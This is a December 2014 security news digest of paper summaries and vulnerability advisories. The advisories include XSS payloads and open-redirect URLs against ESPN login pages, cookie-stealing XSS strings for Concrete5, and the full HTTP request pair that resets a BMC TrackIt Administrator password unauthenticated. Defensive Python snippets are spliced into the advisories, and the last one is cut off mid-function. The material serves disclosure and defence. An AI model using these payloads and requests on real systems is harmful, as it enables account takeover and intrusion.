
Paper: Do not trust me: Using malicious IdPs for analyzing and attacking Single Sign-On

Abstract. Single Sign-On (SSO) systems simplify login procedures by using an Identity Provider (IdP) to issue authentication tokens which can be consumed by Service Providers (SPs). Traditionally, IdPs are modeled as trusted third parties. This is reasonable for SSO systems like Kerberos, MS Passport and SAML, where each SP explicitly specifies which IdP it trusts. However, in open systems like OpenID and OpenID Connect, each user may set up his own IdP, and a discovery phase is added to the protocol flow. Thus it is easy for an attacker to set up its own IdP.

In this paper we use a novel approach for analyzing SSO authentication schemes by introducing a malicious IdP. With this approach we evaluate one of the most popular and widely deployed SSO protocols – OpenID.

We found four novel attack classes on OpenID, which were not covered by previous research, and show their applicability to real-life implementations. As a result, we were able to compromise 11 out of 16 existing OpenID implementations like Sourceforge, Drupal and ownCloud.

We automated discovery of these attacks in an open source tool, OpenID Attacker, which additionally allows fine-granular testing of all parameters in OpenID implementations.

Our research helps to better understand the message flow in the OpenID protocol, trust assumptions in the different components of the system, and implementation issues in OpenID components. It is applicable to other SSO systems like OpenID Connect and SAML. All OpenID implementations have been informed about their vulnerabilities and we supported them in fixing the issues.

more here...........http://arxiv.org/pdf/1412.1623v1.pdf

Oxygen Forensics releases the new and free Oxygen Forensic Viewer

Oxygen Forensics releases Oxygen Forensic Viewer, a stand-alone tool for viewing and sharing information collected with Oxygen Forensic Suite. Fast, easy and lightweight, Oxygen Forensic Viewer allows accessing the complete set of evidence, analyzing deleted data, examining suspects’ communications and locating all types of evidence with built-in search. While the tool is available to licensed users of Oxygen Forensic Suite, the Suite itself is not required for installing and using Oxygen Forensic Viewer.

Effectively, Oxygen Forensic Viewer is a perfect tool for sharing information with colleagues and coworkers, enabling easy access to evidence collected with Oxygen Forensic Suite without additional costs and learning curve.

more here.........http://www.forensicfocus.com/News/article/sid=2307/

ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Security Vulnerabilities

*ESPN espn.go.com <http://espn.go.com/> Login & Register Page XSS and Dest Redirect Privilege Escalation Security Vulnerabilities*

*Domain:*
http://espn.go.com/


"As of August 2013, ESPN is available to approximately 97,736,000 pay television households (85.58% of households with at least one television set) in the United States. In addition to the flagship channel and its seven related channels in the United States, ESPN broadcasts in more than 200 countries, operating regional channels in Australia, Brasil, Latin America and the United Kingdom, and owning a 20% interest in The Sports Network (TSN) as well as its five sister networks and NHL Network in Canada." (Wikipedia)

*Vulnerability description:*

Espn.go.com <http://espn.go.com/> has a security problem. It is vulnerable
to XSS (Cross Site Scripting) and Dest Redirect Privilege Escalation (Open
Redirect) attacks.

Those vulnerabilities are very dangerous, since they occur on ESPN's
"login" & "register" pages, which users consider credible. Attackers can
abuse those links to mislead ESPN's users, so the success rate of attacks
may be high.

During the tests, besides the links given in this advisory, a large number
of ESPN's links were found to be vulnerable to those attacks.

The vulnerability occurs on "espn.go.com"'s "login?" & "register" pages
with the "redirect" parameter, e.g.
http://streak.espn.go.com/en/login?redirect=
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=
https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/

Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0.7601)
in Windows 8.

*(1) XSS Vulnerability*

*Vulnerable URLs:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=reddit
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login


*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459"><img
src=x onerror=prompt('justqdjing')>
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=espn"><img
src=x onerror=prompt('justqdjing')>
http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate"><img
src=x onerror=prompt('justqdjing')>
https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login"><img
src=x onerror=prompt('justqdjing')>




*Poc Video:*
https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss.html
<http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html>




*(2) Dest Redirect Privilege Escalation Vulnerability*

One webpage is used for the following tests. The webpage address is
"http://www.diebiyi.com/". Suppose that this webpage is malicious.


*(2.1) Login Page Dest Redirect Privilege Escalation Vulnerability*

*Vulnerable URL 1:*
https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial

*POC:*
https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com


*Vulnerable URL 2:*
http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2Fyahoo101882723190828
<http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2F101882723190828>

*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com



*(2.2) Vulnerabilities Attacked without User Login*

*Vulnerable URL 1:*
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Flinkedinstatus%2Febay%2Falibaba%2F539770783556698112
<http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Fstatus%2Febay%2Falibaba%2F539770783556698112>

*POC:*
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=http%3A%2F%2Fdiebiyi.com
This vulnerability was used to demonstrate "Covert Redirect" of Facebook.

Poc Video:
https://www.youtube.com/watch?v=HUE8VbbwUms

Blog Detail:
http://www.tetraph.com/blog/covert-redirect/covert-redirect-vulnerability-related-to-oauth-2-0-and-openid/




*Vulnerable URL 2:*
http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Freddit%2Fbing%2Ftmallstatus%2Ftmall541002332331606017
<http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Fbing%2Ftmallstatus%2F541002332331606017>

*POC:*
http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=http%3A%2F%2Fgoogle.com





*Vulnerable URL 3:*
http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=https%3A%2F%2Ftwitter.com%2FYahoo%2Fhao123%2Fstatus%2Fyandex%2F%2Fru%2F541950359917580289

POC:
http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=http%3A%2F%2Fgoogle.com





*Poc Video:*
https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.com/2014/12/espn-espn.html
<http://securityrelated.blogspot.sg/2014/12/espn-espn.html>







*(3)* Those security problems were reported to ESPN in early May. However,
they are still unpatched.







Reported by:
Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore.
http://www.tetraph.com/wangjing/






*Blog Details:*
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss_9.html
<http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss_9.html>

CVE-2014-8489 Ping Identity Corporation "PingFederate 6.10.1 SP Endpoints" Dest Redirect Privilege Escalation Security Vulnerability

*CVE-2014-8489 Ping Identity Corporation "PingFederate 6.10.1 SP Endpoints"
Dest Redirect Privilege Escalation Security Vulnerability*





Exploit Title: "Ping Identity Corporation" "PingFederate 6.10.1 SP
Endpoints" Dest Redirect Privilege Escalation Security Vulnerability
Product: PingFederate 6.10.1 SP Endpoints
Vendor: Ping Identity Corporation
Vulnerable Versions: 6.10.1
Tested Version: 6.10.1
Advisory Publication: Dec 09, 2014
Latest Update: Dec 09, 2014
Vulnerability Type: URL Redirection to Untrusted Site  [CWE-601]
CVE Reference: CVE-2014-8489
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]








*Advisory Details*



*(1) Product:*
"PingFederate is a best-of-breed Internet-identity security platform that
implements multiple standards-based protocols to provide cross-domain
single sign-on (SSO) and user-attribute exchange, as well as support for
identity-enabled Web Services and cross-domain user provisioning."




*(2) Vulnerability Details:*
PingFederate 6.10.1 SP Endpoints is vulnerable to Dest Redirect Privilege
Escalation attacks.

The security vulnerability occurs at the "/startSSO.ping?" page with the
"&TargetResource" parameter.

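The ESPN advisory earlier in this feed and the PingFederate TargetResource issue above share one root cause: a redirect parameter is followed (and, in the ESPN case, reflected into an HTML attribute) without validation. The Python below is an added example, not code from either advisory or vendor, showing the two server-side checks that close both issues; the origin, allowed hosts and field name are assumptions.

```python
"""Added example (not from the advisories): validate a login redirect
parameter and escape it before reflecting it. Origin and hosts are assumed."""
from html import escape
from urllib.parse import urljoin, urlsplit

APP_ORIGIN = "https://app.example.com"                    # assumed application origin
ALLOWED_HOSTS = {"app.example.com", "r.app.example.com"}  # assumed allowlist
DEFAULT_TARGET = "/"
# Characters permitted in a URL by RFC 3986; the advisory's payload uses
# '"', '<', '>' and space, none of which are in this set.
URL_CHARS = frozenset(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    "-._~:/?#[]@!$&'()*+,;=%")


def safe_redirect_target(raw, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_TARGET):
    """Return an absolute URL that is safe to place in a Location header.

    Anything that does not resolve to an allowed host over http(s) falls
    back to `default`, so the parameter can never send the user off-site.
    """
    fallback = urljoin(APP_ORIGIN, default)
    if not isinstance(raw, str):
        return fallback
    raw = raw.strip()
    if not raw or any(c not in URL_CHARS for c in raw):
        return fallback
    # Relative paths resolve against our own origin. A protocol-relative
    # "//evil.com" becomes "https://evil.com" and fails the host check;
    # "javascript:..." keeps its scheme and fails the scheme check.
    absolute = urljoin(APP_ORIGIN, raw)
    parts = urlsplit(absolute)
    if parts.scheme not in ("http", "https"):
        return fallback
    # .hostname drops userinfo and port, so "https://app.example.com@evil.com"
    # is seen as "evil.com" rather than as the trusted host.
    host = parts.hostname or ""
    if host.lower() not in allowed_hosts:
        return fallback
    return absolute


def hidden_redirect_field(target):
    """Reflect the (already validated) target into a form. escape(quote=True)
    turns '"' into '&quot;', so a value can never close the attribute the
    way the '"><img ...>' payload in the ESPN advisory does."""
    return '<input type="hidden" name="redirect" value="%s">' % escape(target, quote=True)
```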






*References:*
http://tetraph.com/security/cves/cve-2014-8489-ping-identity-corporation-pingfederate-6-10-1-sp-endpoints-dest-redirect-privilege-escalation-security-vulnerability/
http://documentation.pingidentity.com/display/PF610/PingFederate+6.10
http://cwe.mitre.org
http://cve.mitre.org/

CVE-2014-8751 goYWP WebPress Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

*CVE-2014-8751  goYWP WebPress Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*







Exploit Title: goYWP WebPress Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities
Product: WebPress
Vendor: goYWP
Vulnerable Versions: 13.00.06
Tested Version: 13.00.06
Advisory Publication: Dec 09, 2014
Latest Update: Dec 09, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8751
Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]







*Advisory Details:*

*(1) Product*
"WebPress is the foundation on which we build web sites. It’s our unique
Content Management System (CMS), flexible enough for us to build your dream
site, and easy enough for you to maintain it yourself."



*(2) Vulnerability Details:*
goYWP WebPress is vulnerable to XSS attacks.

*(2.1)* The first security vulnerability occurs at the "/search.php" page
with the "&search_param" parameter in HTTP GET.

*(2.2)* The second security vulnerability occurs at the "/forms.php" (form
submission) page with the "&name", "&address" and "&comment" parameters in
HTTP POST.










*References:*
http://tetraph.com/security/cves/cve-2014-8751-goywp-webpress-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://www.goywp.com/view/cms
http://www.goywp.com/demo.php
http://cwe.mitre.org
http://cve.mitre.org/

Keurig 2.0 Genuine K-Cup Spoofing Vulnerability

*Overview*


Keurig 2.0 Coffee Maker contains a vulnerability in which the authenticity
check for coffee pods, known as K-Cups, uses weak verification methods that
are subject to a spoofing attack through re-use of a previously verified K-Cup.


*Impact*


CVSS Base Score: 4.9

Impact Subscore: 6.9

Exploitability Subscore: 3.9


Access Vector: Local

Access Complexity: Low

Authentication: None


Confidentiality Impact: None

Integrity Impact: Complete

Availability Impact: None


*Vulnerable Versions*

Keurig 2.0 Coffee Maker


*Technical Details*


Keurig 2.0 is designed to only use genuine Keurig-approved coffee K-Cups.
However, a flaw in the verification method allows an attacker to use
unauthorized K-Cups: the Keurig 2.0 does not verify that the K-Cup foil lid
used for verification has not been re-used.


Step 1: Attacker uses a genuine K-Cup in the Keurig machine to brew coffee
or hot chocolate.

Step 2: After brewing is complete, attacker removes the genuine K-Cup from
the Keurig and uses a knife or scissors to carefully remove the full foil
lid from the K-Cup, ensuring to keep the full edges intact. Attacker keeps
this for use in the attack.

Step 3: Attacker inserts a non-genuine K-Cup in the Keurig, and closes the
lid. Attacker should receive an "oops" error message stating that the K-Cup
is not genuine.

Step 4: Attacker opens the Keurig, leaving the non-genuine K-Cup in the
Keurig, and carefully places the previously saved genuine K-Cup lid on top
of the non-genuine K-Cup, lining up the puncture hole to keep the lid in
place.

Step 5: Attacker closes the Keurig, and is able to brew coffee using the
non-genuine K-Cup.


Since no fix is currently available, owners of Keurig 2.0 systems may wish
to take additional steps to secure the device, such as keeping the device
in a locked cabinet, or using a cable lock to prevent the device from being
plugged in when not being used by an authorized user.


Please note that a proof of concept is already available online.


*Credit: *

Proof of concept at http://www.keurighack.com/

Vulnerability Writeup by Ken Buckler, Caffeine Security
http://caffeinesecurity.blogspot.com

Concrete5 CMS Reflected Cross-Site Scripting Vulnerabilities

Title: Concrete5 CMS Reflected Cross-Site Scripting Vulnerabilities
Author: Simo Ben youssef
Contact: Simo_at_Morxploit_com
Discovered: 02 November 2014
Updated: 9 December 2014
Published: 9 December 2014
MorXploit Research
http://www.MorXploit.com
Vendor: Concrete5
Vendor url: www.concrete5.org
Software: Concrete5 CMS
Versions: 5.7.2 and 5.7.2.1 (probably older)
Status: Unpatched
Vulnerable scripts:
single_pages/dashboard/users/groups/bulkupdate.php
tools/dashboard/sitemap_drag_request.php
Original document: http://morxploit.com/morxploits/morxconxss.txt

About Concrete5 (from Wikipedia):
Concrete5 is an open source content management system (CMS) for publishing content on the World Wide Web and intranets.
Concrete5 was designed for ease of use, for users with a minimum of technical skills. It enables users to edit site content directly from the page. It provides version management for every page, similar to wiki software, another type of web site development software. concrete5 allows users to edit images through an embedded editor on the page.

To learn more please visit:
http://en.wikipedia.org/wiki/Concrete5
http://www.concrete5.org/

Description:
Concrete5 is vulnerable to Cross-Site Scripting, both bulkupdate.php and sitemap_drag_request.php scripts fail to properly sanitize user-supplied input.

PoC Exploit:
bulkupdate.php XSS is exploitable through $_REQUEST['gName']

Using HTTP GET Method:
http://target/index.php/dashboard/users/groups/bulkupdate/search?gName="><script>alert(document.cookie)</script>&ccm-submit-button=Search

Using HTTP POST Method:
POST http://target/index.php/dashboard/users/groups/bulkupdate/search

POST DATA:
gName="><script>alert(document.cookie)</script>&ccm-submit-button=Search


sitemap_drag_request.php XSS is triggered through $_REQUEST['instance_id'], but it requires a valid ccm_token value, which makes it unexploitable (unless the attacker somehow obtains a valid token).

Using HTTP GET Method:
http://target/index.php/tools/required/dashboard/sitemap_drag_request?origCID=147&destCID=148&instance_id="><BODY ONLOAD=alert(document.cookie)>&ctask=MOVE&ccm_token=1418116264:3ac1b1774e77fbc61b1c6b97a4f7c9ea&dragMode=over

Mitigation:
Validate/sanitize user-supplied input passed through $_REQUEST['gName'] and $_REQUEST['instance_id'].

Disclosure time-line
02 November 2014: Discovery.
03 November 2014: Initial report sent.
11 November 2014: Second contact.
No response.
09 December 2014: Public disclosure.

Author disclaimer:
The information contained in this entire document is for educational, demonstration and testing purposes only.
Author cannot be held responsible for any malicious use or damage. Use at your own risk.

Multiple vulnerabilities in InfiniteWP Admin Panel

Multiple vulnerabilities in InfiniteWP Admin Panel
https://lifeforms.nl/20141210/infinitewp-vulnerabilities/

-----

InfiniteWP (http://www.infinitewp.com/) allows an administrator to manage multiple Wordpress sites from one control panel. According to the InfiniteWP homepage, it is used on over 317,000 Wordpress sites.

The InfiniteWP Admin Panel contains a number of vulnerabilities that can be exploited by an unauthenticated remote attacker.

These vulnerabilities allow taking over managed Wordpress sites by leaking secret InfiniteWP client keys, allow SQL injection, allow cracking of InfiniteWP admin passwords, and in some cases allow PHP code injection.

It is strongly recommended that InfiniteWP users upgrade to InfiniteWP Admin Panel 2.4.4, and apply the recommendations at the end of this post.

-----

Issue 1: login.php unauthenticated SQL injection vulnerability
Vulnerable: InfiniteWP Admin Panel <= 2.4.2

User-controlled parameter email appears in a SQL query modified by function filterParameters() which ostensibly "filters" its arguments, but escaping is not being performed, because the parameter $DBEscapeString is set to false by default. This allows for SQL injection.

-----

Issue 2: execute.php unauthenticated SQL injection vulnerability
Vulnerable: InfiniteWP Admin Panel <= 2.4.3

User-controlled parameter historyID appears without quotes in a SQL query. Additionally, user-controlled parameters historyID and actionID should be escaped by function filterParameters(), but escaping is not being performed, because $DBEscapeString is set to false by default. This allows for SQL injection.

-----

Issue 3: uploadScript.php unrestricted file upload vulnerability
Vulnerable: InfiniteWP Admin Panel <= 2.4.3

Unauthenticated users can upload various file types to the uploads directory, including .php files, if query parameter allWPFiles is set. File names however are suffixed with the .swp extension when written to the file system.

If the following two conditions hold, this leads to PHP injection:

1. The uploads directory must be writable by the webserver.
2. The webserver must interpret *.php.swp files as PHP code, which happens when Apache is used with configuration 'AddHandler application/x-httpd-php .php' or 'AddType application/x-httpd-php .php' (This is discouraged by PHP, but older distributions and some shared hosts use it)

-----

Issue 4: Insecure password storage
Vulnerable: All versions including current (2.4.4)

Passwords are stored as unsalted SHA1 hashes in iwp_users.password. These passwords can easily be cracked.

Cracking a password allows a successful attacker to keep their access to the admin panel even after security updates are applied.
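To make issue 4 concrete: the Python below is an added example, not InfiniteWP code, contrasting the unsalted SHA1 storage described above with a salted, iterated hash, and showing the migration step that replaces a legacy value on the next successful login. The column and function names and the iteration count are assumptions.

```python
"""Added example (not InfiniteWP code): the unsalted SHA1 storage the
advisory describes beside a salted, iterated replacement and a migration
path. Column/function names and the iteration count are assumptions."""
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 200_000   # assumed; tune so one hash costs ~100 ms


def legacy_sha1(password):
    """iwp_users.password as the advisory describes it: hex SHA1, no salt."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def precompute_table(wordlist):
    """Why no salt is fatal: one table of hash -> candidate, built once,
    recovers every account whose password it contains, and identical
    passwords are visible as identical hashes without any cracking."""
    return {legacy_sha1(word): word for word in wordlist}


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256, stored as one self-describing string
    (algorithm$iterations$salt_hex$dk_hex) so parameters can change later."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                             PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Constant-time check of a candidate against a stored hash string."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256" or not parts[1].isdigit():
        return False
    _, iterations, salt_hex, dk_hex = parts
    try:
        salt = bytes.fromhex(salt_hex)
    except ValueError:
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                             int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def upgrade_on_login(password, stored):
    """Migration for an existing table of SHA1 values: a legacy hash is
    accepted once and immediately replaced. Returns (ok, value_to_store)."""
    if stored.startswith("pbkdf2_sha256$"):
        return verify_password(password, stored), stored
    if hmac.compare_digest(legacy_sha1(password), stored):
        return True, hash_password(password)
    return False, stored
```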

-----

Recommendations

We recommend that users of InfiniteWP take the following actions:

1. Upgrade InfiniteWP Admin Panel to version 2.4.4.
2. Check the uploads directory for the presence of any unauthorized file uploads.
3. Change admin passwords for the InfiniteWP Admin Panel and any Wordpress sites in the panel. Use long and unique passwords.
4. Remove and re-add Wordpress sites to the InfiniteWP Admin Panel, in order to generate new secret keys.
5. Strongly consider limiting access to the InfiniteWP Admin Panel, especially if you do not require customer access to the panel. For instance, use a .htaccess file to add authentication and limit IP addresses. If possible, protect the panel with a web application firewall (WAF) such as ModSecurity.

-----

Timeline

- 26 Nov: Vulnerabilities and patches submitted to InfiniteWP
- 27 Nov: InfiniteWP publishes version 2.4.3 with fix for issue 1
- 4 Dec: Incomplete fix reported to InfiniteWP
- 9 Dec: InfiniteWP publishes version 2.4.4 with fix for issues 2-3
- 10 Dec: Vulnerabilities published

-----

Credits

The vulnerabilities were found by Walter Hop, Slik BV (http://www.slik.eu/), The Netherlands.

'Destover' Malware Now Digitally Signed by Sony Certificates

Several days ago, our products detected an unusual sample from the Destover family. The Destover family of trojans has been used in the high profile attacks known as DarkSeoul, in March 2013, and more recently, in the attack against Sony pictures in November 2014. We wrote about it on December 4th, including the possible links with the Shamoon attack from 2012.

more here..........https://securelist.com/blog/security-policies/68073/destover-malware-now-digitally-signed-by-sony-certificates/

Hiding In Plain Sight

Malware authors are known for developing clever, interesting and sometimes dastardly ways to move, hide and distribute their wares to the masses.

They often work tirelessly to stay ahead of security analysts by playing on doubts, limitations and red tape. Some authors use trivial encryptions or encoding schemes like base64 while others use high-grade encryption or perform small modifications to a file to avoid detection.

If that does not work, the attacker can hide content in, or append content to image files or files made to look like images, but structurally they are another file type entirely. From a forensic standpoint, some of these files do not have a known structure and can be extremely difficult to identify and categorize, therefore they fall into the anomalous category.

more here.........http://www.solutionary.com/resource-center/blog/2014/12/analyzing-anomalous-data-structures/

Hidden Costs of Memory Allocation

It’s important to understand the cost of memory allocations, but this cost can be surprisingly tricky to measure. It seems reasonable to measure this cost by wrapping calls to new[] and delete[] with timers. However, for large buffers these timers may miss over 99% of the true cost of these operations, and these hidden costs are larger than I had expected.

more here...........http://randomascii.wordpress.com/2014/12/10/hidden-costs-of-memory-allocation/

Reproducible Malware Analyses for All

Summary: With help from GTISC, I have begun running 100 malware samples per day and posting the PANDA record & replay logs online at http://panda.gtisc.gatech.edu/malrec/. The goal is to lower the barriers to entry for doing dynamic malware research, and to make such research reproducible.


more here.......http://moyix.blogspot.com/2014/12/reproducible-malware-analyses-for-all.html

Now available: white papers on Regin's stage 1 components.

These are meant to be a contribution for those who are inspecting their own systems and configurations. The papers provide analysis of the components that most people will run into first if Regin is present, and hopefully this will help identify future versions.

more here.........https://www.f-secure.com/weblog/archives/00002774.html

WordpreXSS Exploitation

In today’s post I am going to show a real-world example of stealing someone’s WordPress credentials using XSS exploitation, and getting shell access to the underlying host.

more here..........https://blog.gaborszathmari.me/2014/12/10/wordpress-exploitation-with-xss/

RedCloth contains unfixed XSS vulnerability for 9 years

I disclosed the following advisory about an XSS vulnerability in
RedCloth (Textile library for Ruby).
http://co3k.org/blog/redcloth-unfixed-xss-en

You shouldn't use RedCloth to parse user-supplied content and output
the parsed string (unless you allow your users to write arbitrary
JavaScript code on your site), because it has contained an unfixed XSS
vulnerability for 9 years, which has also been publicly disclosed for
2 years.

Unfortunately, we cannot expect the current developer to fix the
vulnerability, because he announced that he is "unable to keep fixing
bugs or work on the next major release".

If you want to continue to use RedCloth for such content, you should
patch the problem yourself, consider contributing to RedCloth, or take
other measures.

PoC
===

```ruby
require 'redcloth'

# Even with every filter option enabled, the javascript: link target is
# passed straight through into the generated <a href>.
print RedCloth.new('["clickme":javascript:alert(%27XSS%27)]',
                   [:filter_html, :filter_styles, :filter_classes, :filter_ids]).to_html

# Result:
# <p><a href="javascript:alert(%27XSS%27)">clickme</a></p>
```

Timeline
========

* Feb. 24, 2012 : I reported the problem to a developer (by sending e-mail)
* Feb. 29, 2012 : A developer discloses the issue in this ticket:
http://jgarber.lighthouseapp.com/projects/13054-redcloth/tickets/243-xss
* ...
* Sep. 24, 2014 : A developer announced "RedCloth needs new maintainers",
asking someone to take over RedCloth:
https://github.com/jgarber/redcloth/commit/b24f03db023d1653d60dd33b28e09317cd77c6a0

BMC TrackIt! Unauthenticated Arbitrary Local System User Password Change

BMC TrackIt! 11.3 Unauthenticated Local User Password Change
Trial available here: http://www.trackit.com

A Metasploit pull request has been made here:
https://github.com/rapid7/metasploit-framework/pull/4359

BMC TrackIt! 11.3 when installed with TrackItWeb! allows an unauthenticated
user to change any local user's password, such as Administrator. If the
ability to log in remotely via SMB is enabled on the server, this can yield
an unauthenticated user a shell of SYSTEM using the psexec module in
Metasploit. This was tested against Windows Server 2008 R2 in a relatively
default (trackit installs SQL server) installation. A domain was set up and
the web server was added to the domain. Domain credentials were not able to
be set, only local users.

Using the Registration link in the top right of the
/PasswordReset/Application/Main page, the UI requires the user's password
to continue. However, the request made after to actually register the local
user is disparate from the authentication request and can be sent
independently. This allows an unauthenticated user to now reset that user's
password. Because the Password Reset form makes a separate distinct request
to check the answers to the secret question, the request to actually change
a user's password can be made as any user.

The first request looks like:

POST /PasswordReset/Application/Register HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset
Content-Length: 318
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

domainname=WIN-P3AET0NFP1N&userName=Administrator&emailaddress=fdjhsahjfd%
40fdsafdsa.com
&userQuestions=[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]&updatequesChk=false&SelectedQuestion=1&SelectedQuestion=2&answer=not&answer=not&confirmanswer=not&confirmanswer=not

A valid ASP.NET_SessionId is required; it is obtained with a GET to
/PasswordReset/, and the value from the resulting Set-Cookie header is then
used as the cookie in all subsequent requests. The domainname parameter can
be the name of the computer, which is the default value on the registration
page. The userName parameter is the user to register with the application.
You can attempt this with a user already registered with no issue (though
changing the secret answers to known values is probably bad too).

The second request looks like this:

POST /PasswordReset/Application/ResetPassword HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset/Application/Main
Content-Length: 92
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot; UserName=Administrator
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

newPassword=n0tpassw0rd!&domain=WIN-P3AET0NFP1N&UserName=Administrator&CkbResetpassword=true

The domain and UserName parameters should match those supplied in the
previous registration request. The newPassword parameter will need to meet
any local standard enforced by GPO.

Combining these two requests allows an unauthorised user to register a
local user as eligible for a password reset via the password reset form,
then take advantage of the subsequent password reset vulnerability to
change the password of any local user, including Administrator.
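The underlying flaw is that each request is trusted on its own; the fix is to make every step prove, in server-side session state, that the previous step succeeded for the same user. The Python below is an added example of that binding, not BMC code; the function names, endpoints and user store are assumptions.

```python
"""Added example (not BMC code): binding each step of a password-reset
flow to server-side session state so that Register and ResetPassword can
no longer be sent on their own. Names and the user store are assumptions."""
import hmac
import secrets

# Constructed user store. Passwords are held in the clear only to keep the
# example short; a real store would hold salted hashes.
USERS = {
    "Administrator": {"password": "Tr@ckIt-demo", "questions": None},
    "alice": {"password": "alice-pw", "questions": None},
}


class ResetFlowError(Exception):
    """Raised when a request arrives out of order or for the wrong user."""


def new_session():
    """Server-side state behind a session cookie such as ASP.NET_SessionId."""
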